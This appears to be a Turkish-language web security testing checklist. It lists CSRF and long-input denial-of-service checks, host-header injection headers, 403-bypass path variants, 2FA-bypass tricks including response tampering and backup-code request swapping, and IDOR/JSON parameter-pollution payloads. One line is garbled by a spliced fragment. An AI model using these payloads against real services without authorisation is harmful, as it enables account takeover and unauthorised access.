CSRF Belirtecinin Token 2 hesap oluşturarak kontrol et
DOS
Long_Password
Long_String
Form Alanı gibi birşey Profile name 1000 karakter daha sonra farklı bir hesaptan o hesabı ara
sıfırlama sırasında veya Kayıt ol şifreyi 1000 karakterden uzun birşey gir ya sayfa 500 hata vericek yada uzun süre bekleyecek
HHİ
X-Original-Url:
X-Forwarded-Server:
X-Host:
X-Forwarded-Host:
X-Rewrite-Url:
two host veya space host
Forbidden
/admin/
admin..;/
whatever/..;/admin
secret/.
/secret//
/./secret/..
/admin#
/admin;/
/./admin/./
/admin?param
/%2e/admin
/admin/~
/admin%20/
GET-POST
Path Scan
/%20admin%20/
2FA Bypass
One Account Two Browsers
Kullanmış olduğumuz Kodu tekrar kullanıyoruz
Kullanmış olduğumuz Kodu tekrar farklı bir hesapta kullanıyoruz
Devre dışı bırakma kısmında password soruyorsa yanlı birşey girip kontrol yapılıyor mu bakılacak
2fa devre dışı bırakılıp etkinleştirildiğinde eski 2fa geçerli mi
2fa etkinleştirilditen sonra google vb şey ile girmeyi çalış 2fa soruyormu
{"code": true}
{"sstatus": 200}
{"success": true}
Yanıtta kod yansıtılıyor mu kontrol et
code=null
Referer header
SMS Rate limith
Backup kosuccess":"true"d işlevselliği var ise şunu deneyebilirsin önce doğru kullanıcı adı şifre ve otp kodu ile repater ile response'da backup kodlarını al 2.hesaba kullanıcı adını ve parolasını doğru ver fakat otp kodunu doğru verme isteği durdur 1.Replace = POST /api/backup 2.Replace = {"action":"backup_codes","clusterNum":"000","accountId":"test123","email":"test123@gmail.com"} olarak değiştir ve isteği yolla
IDOR
getuser"?id=1234"
HPP
getuser.json
{"user": [123]} Dizi ile Sar
{"user_id": {"user_id": 111}} Json ile Sar
JSON HPP
Victim userid= 22 403 For
Victim userid= 23-1 200 OK